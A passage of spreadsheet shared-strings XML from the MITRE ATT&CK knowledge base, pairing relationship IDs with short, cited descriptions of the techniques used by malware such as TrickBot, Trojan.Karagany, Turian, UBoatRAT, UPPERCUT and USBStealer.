    <t>[TrickBot](https://attack.mitre.org/software/S0266) downloads several additional files and saves them to the victim's machine.(Citation: Trend Micro Totbrick Oct 2016)(Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>relationship--d8e0ed13-7938-4c9c-99ef-511b8dbf76aa</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects the users of the system.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>relationship--76d7d7fa-94a4-4fa6-9fd2-e9af9ab0f356</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has attempted to get users to launch malicious documents to deliver its payload. (Citation: TrendMicro Trickbot Feb 2019)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--6b55eeb9-c7a1-4ff5-b8ef-f114e3a1b75a</t>
  </si>
  <si>
    <t>28 March 2019</t>
  </si>
  <si>
    <t>The [TrickBot](https://attack.mitre.org/software/S0266) downloader has used an icon to appear as a Microsoft Word document.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--a8126b8d-8dd7-4e12-a384-96dabb975725</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can modify registry entries.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>relationship--c75ec383-2acd-479f-b9b7-b2038ec10a7d</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</si>
  <si>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</si>
  <si>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relationship--2af126e3-89ef-45b4-b345-45567ef17dfa</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>relationship--7cbc6309-f5fb-41e5-901b-67f02f29a834</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</si>
  <si>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</si>
  <si>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relationship--b75e158b-3c2e-425d-a14e-84a974d86c8c</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>relationship--4ff492bf-f91d-445d-a29e-6e60c67a05c1</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can steal passwords from the KeePass open source password manager.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--bc016a10-a594-495b-8822-ca054050f144</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can identify the groups the user on a compromised host belongs to.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--887d8bb3-1bd5-4010-81dc-fe479690e72d</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has been known to use PowerShell to download new payloads, open documents, and upload data to command and control servers. 
 (Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>relationship--3a26d78f-e0cb-4a58-8d84-6d867b32f279</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses module networkDll for process list discovery.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>relationship--9af0d85e-688a-4dd7-a04e-a175e268855c</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) injects into the svchost.exe process.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Totbrick Oct 2016)(Citation: Microsoft Totbrick Oct 2017)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--e0ce4a5f-ac3b-4d61-b540-c5c3c434beb0</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used &lt;code&gt;Nt*&lt;/code&gt; [Native API](https://attack.mitre.org/techniques/T1106) functions to inject code into legitimate processes such as &lt;code&gt;wermgr.exe&lt;/code&gt;.(Citation: Joe Sec Trickbot)</t>
  </si>
  <si>
    <t>relationship--dc309013-0487-47fa-b514-71e18344a2db</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) establishes persistence in the Startup folder.(Citation: ESET Trickbot Oct 2020)</t>
  </si>
  <si>
    <t>relationship--e84c3f01-fb77-40e6-8507-42bc500bd928</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) uses vncDll module to remote control the victim machine.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)</t>
  </si>
  <si>
    <t>relationship--9f372adb-777a-4635-9310-cbb8f432f08e</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can enumerate computers and network devices.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--b0bba4a5-a3c3-4cf7-9347-c9070cb18998</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) creates a scheduled task on the system that provides persistence.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Totbrick Oct 2016)(Citation: Microsoft Totbrick Oct 2017)</t>
  </si>
  <si>
    <t>relationship--17ce446f-1a76-46d5-a276-589713425af8</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) leverages a custom packer to obfuscate its functionality.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>relationship--5ae4207c-95db-4a16-bfac-1d8daf29ba4a</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used an email with an Excel sheet containing a malicious macro to deploy the malware(Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>relationship--fb27a498-e1c1-47a4-a668-32c58c359f71</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has been delivered via malicious links in phishing e-mails.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--7dee0645-9c39-4e04-8012-6ae10a449ae9</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can Base64-encode C2 commands.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--7d13961a-5fcc-4c97-aeda-f3e42325aabf</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</si>
  <si>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</si>
  <si>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relationship--71bb09bc-0405-43ed-9848-bf685234c670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</si>
  <si>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</si>
  <si>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relationship--01aac35b-55e1-40d6-962f-5b5a6efdb2be</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) obtains the IP address, location, and other relevant network information from the victim’s machine.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--f7bcd411-995f-41cb-b8ed-c333b0435ed3</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) can identify the user and groups the user belongs to on a compromised host.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--03251067-ee3a-49e4-addc-86daaa8a3203</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) collects a list of install programs and services on the system’s machine.(Citation: S2 Grupo TrickBot June 2017)</t>
  </si>
  <si>
    <t>relationship--d1f44e84-61cb-4a96-add8-d37a38369e43</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used &lt;code&gt;printf&lt;/code&gt; and file I/O loops to delay process execution as part of API hammering.(Citation: Joe Sec Trickbot)</t>
  </si>
  <si>
    <t>relationship--9e07c247-c778-496d-9972-6581f2d10c93</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used a VNC module to monitor the victim and collect information to pivot to valuable systems on the network (Citation: Trickbot VNC module July 2021)(Citation: Bitdefender Trickbot VNC module Whitepaper 2021)</t>
  </si>
  <si>
    <t>relationship--42eb6018-f049-41df-bbfc-6dcb2f079f16</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</si>
  <si>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</si>
  <si>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relationship--e882b88e-7731-4bee-a644-c02f9aff2306</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) has used macros in Excel documents to download and deploy the malware on the user’s machine.(Citation: TrendMicro Trickbot Feb 2019)</t>
  </si>
  <si>
    <t>relationship--9fb5ad4c-1929-4d00-bd87-fed2558d73bf</t>
  </si>
  <si>
    <t>[TrickBot](https://attack.mitre.org/software/S0266) establishes persistence by creating an autostart service that allows it to run whenever the machine boots.(Citation: Trend Micro Trickbot Nov 2018)</t>
  </si>
  <si>
    <t>relationship--5235fbdb-5c53-4860-a459-cd4b538817db</t>
  </si>
  <si>
    <t xml:space="preserve">[Trojan.Karagany](https://attack.mitre.org/software/S0094) can monitor the titles of open windows to identify specific keywords.(Citation: Secureworks Karagany July 2019)	 </t>
  </si>
  <si>
    <t>relationship--25bfb4d8-c401-4064-9ee4-24091cb86ba6</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can secure C2 communications with SSL and TLS.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--96bf1608-d1fc-477f-be54-0dba2efd0038</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can steal data and credentials from browsers.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--519b3d7a-2de3-470b-a1cd-f40d0c351ea3</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) has used plugins with a self-delete capability.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--6645bf91-574b-46c3-b816-8ed45a465417</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can enumerate files and directories on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--7adebe2e-97f7-4a1a-8ac7-01b795dadc36</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can upload, download, and execute files on the victim.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--7282eabe-73e0-4a10-824b-f18df7f892e2</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can capture keystrokes on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--7808fe28-aa6f-4e81-9029-8b95bec15ad3</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create directories to store plugin output and stage data for exfiltration.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--7cf7d162-a34f-4951-a643-5bf959283f6b</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can dump passwords and save them into &lt;code&gt;\ProgramData\Mail\MailAg\pwds.txt&lt;/code&gt;.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>relationship--b149adfe-547f-4cd4-af4a-ea7018a203c1</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can base64 encode and AES-128-CBC encrypt data prior to transmission.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--2b00f3f4-ddde-4874-8315-5a5c5d671a33</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use [Tasklist](https://attack.mitre.org/software/S0057) to collect a list of running tasks.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--51a03c8a-1983-4bdd-b326-78ec67f86f06</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can create a link to itself in the Startup folder to automatically start itself upon system restart.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--57e1f6b0-7fbd-49b4-8f5d-876b759437ac</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can take a desktop screenshot and save the file into &lt;code&gt;\ProgramData\Mail\MailAg\shot.png&lt;/code&gt;.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--0bd9fd2b-e2f7-48f1-8988-31c041691585</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--40c202ae-fd92-4506-b72a-5fb0e7bcf99a</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can detect commonly used and generic virtualization platforms based primarily on drivers and file paths.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--9893220d-5db9-4978-a886-ff33cf417584</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can capture information regarding the victim's OS, security, and hardware configuration.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--5a415555-1367-47dd-9757-88a86430cf49</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information on the network configuration of a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--c1ea9582-0477-4226-a0ba-af03255d01dd</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use [netstat](https://attack.mitre.org/software/S0104) to collect a list of network connections.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--0f6041e9-c2cb-4a22-951d-13587fe4a547</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information about the user on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--00ce5c68-cb85-46d1-a6ba-7b2b767b0f09</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can inject a suspended thread of its own process into a new process and initiate via the &lt;code&gt;ResumeThread&lt;/code&gt; API.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--8e34d10d-0c24-41c6-8bde-727768256479</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can communicate with C2 via HTTP POST requests.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--e93e4ac1-090d-4081-8cb5-9af71e807fd3</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can perform reconnaissance commands on a victim machine via a cmd.exe process.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>relationship--deab6c7f-8d5e-4c77-ab58-3d8cf9c2adf4</t>
  </si>
  <si>
    <t>S0001</t>
  </si>
  <si>
    <t>Trojan.Mebromi</t>
  </si>
  <si>
    <t>malware--c5e9cb46-aced-466c-85ea-7db5572ad9ec</t>
  </si>
  <si>
    <t>[Trojan.Mebromi](https://attack.mitre.org/software/S0001) performs BIOS modification and can download and execute a file as well as protect itself from removal.(Citation: Ge 2011)</t>
  </si>
  <si>
    <t>relationship--89cbf71b-9189-43ac-927f-e5aaf9d66df0</t>
  </si>
  <si>
    <t>To establish persistence, [Truvasys](https://attack.mitre.org/software/S0178) adds a Registry Run key with a value "TaskMgr" in an attempt to masquerade as the legitimate Windows Task Manager.(Citation: Microsoft Win Defender Truvasys Sep 2017)</t>
  </si>
  <si>
    <t>relationship--84bc4ba8-ab0e-4c60-92ed-26496a831611</t>
  </si>
  <si>
    <t>[Truvasys](https://attack.mitre.org/software/S0178) adds a Registry Run key to establish persistence.(Citation: Microsoft Win Defender Truvasys Sep 2017)</t>
  </si>
  <si>
    <t>relationship--55df3b40-b130-4313-9064-6b0fc56564d0</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can use WinRAR to create a password-protected archive for files of interest.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--855a735f-756f-4911-a69b-454439a38037</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) has the ability to use a XOR decryption key to extract C2 server domains and IP addresses.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--9d293200-1425-4a77-8a2e-75a1ffb78310</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can search for specific files and list directories.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--17a2eeb2-2221-4292-b584-d39d19a6409f</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can download additional files and tools from its C2.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--bfab83a2-934e-4e3c-b2c9-626d88231497</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can insert pseudo-random characters into its network encryption setup.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--b3e28a85-784f-4adb-9398-3bbdaf9275fc</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can store copied files in a specific directory prior to exfiltration.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--b30daf73-f565-4c1e-bc0b-77bb1c22b03f</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can disguise as a legitimate service to blend into normal operations.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--e7550495-1f2c-4987-abdf-a48ec93d43da</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can use VMProtect for obfuscation.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--388ebc0a-6839-4b03-959c-766c1893cf64</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can scan for removable media to collect data.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--f0a42be5-d7ec-475e-a9cd-2c4728153bb8</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) has the ability to use Python to spawn a Unix shell.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--a7d7b40a-aae7-4fbc-a1c9-f6c7b756c4dd</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can establish persistence by adding Registry Run keys.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--7a1dd7b6-f759-4580-b658-e1b5abf12d89</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) has the ability to take screenshots.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--3982f2f1-8fdd-4ccd-84e6-6a13c919c4c9</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can retrieve system information including OS version, memory usage, local hostname, and system adapter information.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--da0a0a14-0f29-43f8-abf7-b281a1071928</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can retrieve the internal IP address of a compromised host.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--a433216f-bd03-4791-98ce-abd4b23c21a5</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can retrieve usernames.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--4abb6550-b362-4f8a-80e4-1d6f094a1e37</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) has the ability to use &lt;code&gt;/bin/sh&lt;/code&gt; to execute commands.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--0f363688-a168-4e9f-94e6-75142875c802</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) has the ability to use HTTP for its C2.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--b6cf9ca0-96e9-4072-9564-0ea741d3bbb6</t>
  </si>
  <si>
    <t>[Turian](https://attack.mitre.org/software/S0647) can create a remote shell and execute commands using [cmd](https://attack.mitre.org/software/S0106).(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>relationship--d843431d-2d98-46c8-b0dd-76427b266597</t>
  </si>
  <si>
    <t>S0116</t>
  </si>
  <si>
    <t>UACMe</t>
  </si>
  <si>
    <t>tool--102c3898-85e0-43ee-ae28-62a0a3ed9507</t>
  </si>
  <si>
    <t>[UACMe](https://attack.mitre.org/software/S0116) contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.(Citation: Github UACMe)</t>
  </si>
  <si>
    <t>relationship--ecd83e69-2eb1-4c2d-a01f-e42ea8f807f9</t>
  </si>
  <si>
    <t>S0333</t>
  </si>
  <si>
    <t>UBoatRAT</t>
  </si>
  <si>
    <t>malware--518bb5f1-91f4-4ff2-b09d-5a94e1ebe95f</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) takes advantage of the /SetNotifyCmdLine option in [BITSAdmin](https://attack.mitre.org/software/S0190) to ensure it stays running on a system to maintain persistence.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>relationship--4f290a4e-983c-460f-b00c-e1bc8dd4d413</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) has used GitHub and a public blog service in Hong Kong for C2 communications.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>relationship--45952aea-8bd7-4f6d-8b23-ee2914860454</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can upload and download files to the victim’s machine.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>relationship--ebf44df8-d7c7-4c95-87f0-e31f88b83c72</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) encrypts instructions in the payload using a simple XOR cipher.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>relationship--e9404ebb-fce5-4596-b0f1-7f8a61578b32</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can list running processes on the system.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>relationship--e29fa4df-f835-48e1-a83b-279818993793</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>relationship--750c8d62-74f3-4566-95fc-97f1685c9ca0</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) has used HTTP for C2 communications.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>relationship--62fbc8c0-0b5c-4650-9f63-696925d5626c</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can start a command shell.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>relationship--3aef452a-4ad9-4882-aebb-0043f2329f1d</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the victim's current directory.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--f757a567-97b2-41b0-b58a-1530156ba457</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) can download and upload files to and from the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--a2ad2bea-4359-47a8-ae5f-f18beab07316</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) can capture desktop screenshots in the PNG format and send them to the C2 server.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--4f2fb45a-8359-4c75-93ae-095fcf9f856e</t>
  </si>
  <si>
    <t>Some versions of [UPPERCUT](https://attack.mitre.org/software/S0275) have used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--64eefbfb-5241-4325-919d-4739504644c2</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the system’s hostname and OS version.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--90355089-e793-4a6a-98b4-c1f20322a98f</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the victim's proxy information.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--7ffec01b-b49c-4851-947f-cd29f9525aef</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to collect the current logged on user’s username from a machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--2ed969c0-be8f-43d1-8226-1009faefaa20</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to obtain the time zone information and current timestamp of the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--242236fe-a0b6-4cf0-b604-beb57ce9925a</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has used HTTP for C2, including sending error codes in Cookie headers.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--00d1f959-5469-4a9c-b33d-93f315719a6c</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) uses cmd.exe to execute commands on the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>relationship--2fbbc518-3feb-4613-9981-297d928c483f</t>
  </si>
  <si>
    <t>For all non-removable drives on a victim, [USBStealer](https://attack.mitre.org/software/S0136) executes automated collection of certain files for later exfiltration.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>relationship--7a892ca0-f915-4dc1-817a-cdcfb6777f28</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</si>
  <si>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</si>
  <si>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relationship--ae8a95fa-c0ad-40b4-a573-a9441ed94fab</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>relationship--c612eb88-d7e0-46cc-a9bc-d0da2977ff00</t>
  </si>
  <si>
    <t>Once a removable media device is inserted back into the first victim, [USBStealer](https://attack.mitre.org/software/S0136) collects data from it that was exfiltrated from a second victim.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>relationship--00ae99d1-db02-4007-8669-04d7fc4c1390</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) exfiltrates collected files via removable media from air-gapped victims.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>relationship--2b97e16e-8c39-4e5e-ad90-15c10f15d923</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) has several commands to delete files associated with the malware from the victim.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>relationship--e5efa7ca-3e2a-4f08-ac2c-f5f317c9caf7</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) searches victim drives for files matching certain extensions (“.skr”,“.pkr” or “.key”) or names.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>relationship--03ab3120-4c6e-4de2-982a-fe22d466f748</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>relationship--fe229513-0cd9-4e9a-a333-2748ef03dfbc</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) mimics a legitimate Russian program called USB Disk Security.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>relationship--a67d4b9b-0c8f-41d8-a7f2-6d4c61fcb1ea</t>
  </si>
  <si>
    <t>Most strings in [USBStealer](https://attack.mitre.org/software/S0136) are encrypted using 3DES and XOR and reversed.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>relationship--016dc21c-ade9-43cc-9d88-a0c4c0891ccc</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>relationship--f7740e3c-c143-40b7-a8da-e797f5d74b50</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) registers itself under a Registry Run key with the name "USB Disk Security."(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>relationship--5b686a7c-4fcd-44c2-9f57-1d88d6633ef4</t>
  </si>
  <si>
